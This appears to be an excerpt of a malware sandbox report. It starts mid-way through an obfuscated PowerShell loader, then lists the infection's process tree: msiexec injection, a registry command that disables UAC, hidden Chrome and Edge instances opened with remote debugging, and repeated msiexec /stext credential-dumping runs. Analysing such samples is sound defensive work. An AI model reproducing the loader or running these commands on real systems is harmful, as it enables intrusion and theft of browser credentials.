StjcCo,noSnkemUltr/EneruKa ec Str? MuleFastxFr lp Retostifr lkytMil,=krybdSgetoKanawStrinIndsl jefoSinga svadAuto&TrvaiI otd R d=S ag1NatraNedfAmuseZVoteB rafNOust5Snob- BukV Regw Se,xRatoq ,toxUgudsEmanSNynauFaneP SupBMathMEnchX Bar2Uns,8TricVFod.RBe.muUnusbOve UT ebnZeeiH UdvxHemo8Desao KluJ';$Kodelaasene231=Counterreforms 'Nonc>';$Gallinule=Counterreforms 'PhasIT,roeManeX';$Ransackers='Standardprogrammers';$Artolater='\Ostentation.Non';Natbordets (Counterreforms 'Pig $SkriG VenladopO Sh BDereALa.elFluo: HypPResuO Le,s etetpeireKejsx Sadi Jens GottAmerESaloNDeteTW bf=Euch$CoxoEciern fl v sam:HenvaMnempByg PChokDA riAgaudt AspAKany+fo a$ Beta.ubrrFedntR,gaoI.dsl C aASport SupEKurtr');Natbordets (Counterreforms ' I r$OptlG uneLT,peOO erbO.hyATo vlCh r:Acrik edkRBrani CrugAm.tsA meKPropa GromOverMOblae arbR Para HlotT.ni=,nvi$ C mF psOhygerReb.eforhsDystK ampr AfsIOuttV.ygre,verRBes.. katS injPColllGnawISa.mTtrae(N,en$M trkAfstoMispdSickEChemlBageA Beea,alks .fsE.hotnGrsre ste2Enek3 Rev1Fera)');Natbordets (Counterreforms $Logaritmen);$Foreskriver=$Krigskammerat[0];$Storico123=(Counterreforms 'Gesc$DentgDobbl R mo Spab Hena BefLFi,k:PindE tamPSofahKiesO PacdChorsquoa=G,apn fluEBaciw Kni-Fr bO fskbGobbjbetjEOxy c MesTsai PrepS GeryUngrsPoettAdene OvemDyna.Forb$Curtasuc KOptaA EksdKryde ,amMMikri DaiSHndtEErhvRRundIBrusNCoungMoloS');Natbordets ($Storico123);Natbordets (Counterreforms 'Till$BamaEOpsppAghohTtheoprocdJa rsPeda. ArgH LabePutraRevedMetreFontr BetsU or[Fist$ ,gnO MaruTramtElmal Neke AutaPe srDaarn Syni cann D mgD.bg]Cyc,=Shiv$.aceO Spif.odtfSciliOutscHeliiOpiuaUddilHalveModvsBi.ne');$Pulmotrachearia=Counterreforms 'Trow$CycaEartipR,nshLigno WoodUnf,sConq. anlDT pso Spiw Deln NedlStovoJyllaJackd TrkFForjiEnd lAfs eB,nt(Fear$Sla,FD nkoFor rdi fePilisSkonkJodtrAnvei.elpvGodkeNonsrConv,pret$S,ciBInsilOrniaC,afk SugkMokkeNondd Adee omosFall)';$Blakkedes=$Postexistent;Natbordets (Counterreforms 'Bila$HitcgConjLMinuo isB AkkAKombLskat:S,atpS.igrBortUAldeN enEFlatRb,urs Svo=Opht(mas tOvereOeveSRelitFred-WrigP,nhaaKonstJingh Pro Rum$Camub BunlZe,mAEmbekTel.K satE smadDanseDrabsmyth)');while (!$Pruners) {Natbordets (Counterreforms 'T nd$Necrg analSperoNotabNikkaFo,slm rk:AggrRUneqeSu ecHeteoUme uStenpBri s vi = kum$rengvi daoShipmTrebipseutS lgo') ;Natbordets $Pulmotrachearia;Natbordets (Counterreforms 'Ideos wr,t NarA WesRBio.TUdga- DepSCha,L Bu,eEremeBeziPSy f ,ilf4');Natbordets (Counterreforms ' Ove$K ltGre.tLAntaO,appbundeAMilil Liv: AmapSkrar H.rUKre nSkidEoverrJoshs V d=O.rr(KoortStanESorts oveTSkat-ProcPEcteAPoneTVarmHFjol Par$civibTjenLMisraChauKForskSkvaEIncuDV cteMar,SExu )') ;Natbordets (Counterreforms 'Fisk$Ti kGSkruL aboOG,ribCochAF jtLPh l:BasuiTeenn.yudDUforbConfYTaktg BadGFoxeEStauRGlateFrgnnGr es For=Hers$ vivg AfllMycoO devbA,tiALuftLThyr:quinA.einPgodbpRetieFondLStafSTaloiRe.uNEnhuB T,mlTentOSkatmCrissVoveTGhauECapirLacu+ ru+Hunn%Tang$PreckP.larSkudI Dr,gEnteS Spok Br.Ano rmAn oML nse T lrUndeAEnchtPleo.Selec BaroSympuMarcnSmaat') ;$Foreskriver=$Krigskammerat[$Indbyggerens]}$Brilleslangers=325720;$Sensitometrically=31471;Natbordets (Counterreforms 'Kl d$H,angInteLT,llO o,yb emoAUr ilGloc:PersQImpruPhreEkaprrVandiI leLBil LAalbae sp Aand= ryk ExingVildeIjolTFauv-BlaccNa oOSupenSyttt ShaETan NKanoTdr,p Tyvs$I flBraveL IndA RetkBolik Bl ededid IndeDabcS');Natbordets (Counterreforms 'Data$FamigInstlEuchoRettb iladepulHack: Ti,PFormhPityyRotolL gelVesio UnssD,imt P soSnacm C niMon,nAr baVisceGl.n2Udta6Krig Phth=fea, Fr [SammSUtnkyUdbrs StatHegneKn lmFidu. olfCF okoInfrnGenevQu neVentrRepat ta]Orme: ulm:DishFE nerInc,o PremdishB,raga klis useSpec6Breb4Wam S,rokt orsrJestiPrean,ekygsans(Arve$JoguQ enuIn.leRadirCroqiC,rdl urilDro aM xe)');Natbordets (Counterreforms 'Fald$O eyg Un LKystO pirB Pura.ommL,and: MulUMolenLe sfCasta,ensv CroOUltrU C nr sh IUnd,nKoorg lie Medh=n ph Opda[Pre,s etrYEo.uSnsvitHy.eE idemblik.n opT ,smeBondXPercTJon..Dob.eR,laNvinkCBib O,egedLoesi Me NHumogFall]M ga:Inde: ugAEle,sDmmeC Pe.i BigiUnc,. .erGBlinESesqtUnmeS Ex tTetrR G.iI rotNU bogBran(samm$FornpPsycHTeokyLynbl visLsstnOA.tis,etht nnOZippm Deti ,ugnHandA Came Bro2Stet6omby)');Natbordets (Counterreforms 'Malp$DeklG onoL Op oTor.b ,liaCa,tlA ad:Sno FMicrLFdreuFireGP titNonaSPro,KGallYSpaldCaudn FinIBrann LetgChroSRevebOni AEp,cnha,de A tR Hy NPer.eLys,= Ant$L ukuTretnUlstF BroaStorvPaciOS edu ilorDr.fi Fa nClasgHyge.GaluSUhanUAdvebuv.dSCatit rotR RedIPirrNSa,rG Und( Udk$ F uBFlygrWastiRet LVitilVittELouksL.niLTotoACostNNa rg xtreSpjtrPapis Dem,Kont$VaassFluieDimiNSandS subIDiffT teOT ksmTautev ejT HadrKod.IMau,CjemaAElevLCo wL GeyyCinq)');Natbordets $Flugtskydningsbanerne;"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:64
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4896
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4036
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:4388
- - C:\Program Files\Google\Chrome\Application\Chrome.exe
    --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:4628
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcfd0ccc40,0x7ffcfd0ccc4c,0x7ffcfd0ccc58
      4⤵
      PID:3064
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1792,i,7574609410607877110,1893691572408400577,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1788 /prefetch:2
      4⤵
      PID:1564
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2016,i,7574609410607877110,1893691572408400577,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2088 /prefetch:3
      4⤵
      PID:660
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2244,i,7574609410607877110,1893691572408400577,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2556 /prefetch:8
      4⤵
      PID:1332
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,7574609410607877110,1893691572408400577,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3180 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:2712
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3000,i,7574609410607877110,1893691572408400577,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3336 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1232
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4656,i,7574609410607877110,1893691572408400577,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4604 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4576
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\eflkfsvzyfwhlpbmdgt"
    3⤵
    PID:3672
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3672 -s 12
      4⤵
      Program crash
      PID:540
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ohrugkgbmnomvvxqmqgvmnn"
    3⤵
    PID:1840
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 12
      4⤵
      Program crash
      PID:3300
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\qbengdruivgqycludbappziipa"
    3⤵
    PID:3892
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3892 -s 12
      4⤵
      Program crash
      PID:2652
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\lqsedbdgwrlkkc"
    3⤵
    PID:3044
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 12
      4⤵
      Program crash
      PID:920
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\vkxxduohkzdpujmmoy"
    3⤵
    PID:1004
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 12
      4⤵
      Program crash
      PID:1700
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\gnliemzbyhvbwxaqxjols"
    3⤵
    PID:4800
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 12
      4⤵
      Program crash
      PID:1468
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:3608
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffcfd9d46f8,0x7ffcfd9d4708,0x7ffcfd9d4718
      4⤵
      PID:3932
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,14200954022901088543,8368229130642307062,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1976 /prefetch:2
      4⤵
      PID:1292
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,14200954022901088543,8368229130642307062,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3
      4⤵
      PID:4952
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1956,14200954022901088543,8368229130642307062,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:8
      4⤵
      PID:2328
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=1956,14200954022901088543,8368229130642307062,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1832
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=1956,14200954022901088543,8368229130642307062,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1988
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=1956,14200954022901088543,8368229130642307062,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4264
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=1956,14200954022901088543,8368229130642307062,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3640
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\cwmsbdeozmrat"
    3⤵
    PID:3736
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3736 -s 12
      4⤵
      Program crash
      PID:4132
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\nqrkcwpivujevkoe"
    3⤵
    PID:4760
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 12
      4⤵
      Program crash
      PID:4564
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\xswddozjjcbrfyciitw"
    3⤵
    PID:4616
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 12
      4⤵
      Program crash
      PID:1284
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\shsuznuv"
    3⤵
    PID:4268
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 12
      4⤵
      Program crash
      PID:3500
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ubyfafeolhx"
    3⤵
    PID:3908
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 12
      4⤵
      Program crash
      PID:920
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\fwdxbypqzpquwm"
    3⤵
    PID:4080
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 12
      4⤵
      Program crash
      PID:1468
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\zlzpxfbbmmuoinwkdfxhazsgafzwjdfodl"
    3⤵
    PID:2468
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 12
      4⤵
      Program crash
      PID:552
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\jnehyx"
    3⤵
    PID:2280
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 12
      4⤵
      Program crash
      PID:2024
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\mhjayifxwc"
    3⤵
    PID:956
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 12
      4⤵
      Program crash
      PID:3120
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\rqlcvhccyhadrozkoyxpoxgxvjpbwqgq"
    3⤵
    PID:2056
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2056 -s 12
      4⤵
      Program crash
      PID:892
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\bsqvw"
    3⤵
    PID:4564
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 12
      4⤵
      Program crash
      PID:540
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\lmdnxsxx"
    3⤵
    PID:3464
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3464 -s 12
      4⤵
      Program crash
      PID:2192
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\gcrftqsivtpopjnyqxllsxgxxiuw"
    3⤵
    PID:2824
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 12
      4⤵
      Program crash
      PID:3452
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\iwexujckjbhtspbczifedcboyomfscz"
    3⤵
    PID:772
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 772 -s 12
      4⤵
      Program crash
      PID:4100
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\tykivbnexjzycwxgqtsggpofgvvolnqmgy"
    3⤵
    PID:4364
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4364 -s 12
      4⤵
      Program crash
      PID:680
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\nnyzraipkgdroxcukfgzdqz"
    3⤵
    PID:2848
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2848 -s 12
      4⤵
      Program crash
      PID:1172
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\yhlssssryoveqlqybqtsgduoan"
    3⤵
    PID:4240
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 12
      4⤵
      Program crash
      PID:4952
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\abqktldkmwnjbrmckbfurhofbtbkf"
    3⤵
    PID:3004
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3004 -s 12
      4⤵
      Program crash
      PID:4040
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\uqmcprpwitrcnsjimn"
    3⤵
    PID:64
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\uqmcprpwitrcnsjimn"
    3⤵
    PID:4700
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4700 -s 12
      4⤵
      Program crash
      PID:4496
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\fssmqcixwbjhpyfmvqgok"
    3⤵
    PID:1688
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1688 -s 12
      4⤵
      Program crash
      PID:1292
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\pnxfqutrkjbuzetqmativihe"
    3⤵
    PID:2504
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 12
      4⤵
      Program crash
      PID:3924
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\mwypouqeloysotui"
    3⤵
    PID:2272
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 12
      4⤵
      Program crash
      PID:1856
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\wydhombyzwqxyaimgioe"
    3⤵
    PID:724
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 724 -s 12
      4⤵
      Program crash
      PID:3984
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\hsjspwlzveikageqxtbxjfu"
    3⤵
    PID:1668
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 12
      4⤵
      Program crash
      PID:4420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1840 -ip 1840
1⤵
PID:2328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3892 -ip 3892
1⤵
PID:4316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3672 -ip 3672
1⤵
PID:1804

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3044 -ip 3044
1⤵
PID:3028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1004 -ip 1004
1⤵
PID:2024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4800 -ip 4800
1⤵
PID:1352

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3068

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3736 -ip 3736
1⤵
PID:2192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4760 -ip 4760
1⤵
PID:4400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4616 -ip 4616
1⤵
PID:3864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4268 -ip 4268
1⤵
PID:5028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3908 -ip 3908
1⤵
PID:404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4080 -ip 4080
1⤵
PID:2192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2468 -ip 2468
1⤵
PID:4856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2280 -ip 2280
1⤵
PID:1532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 956 -ip 956
1⤵
PID:4316
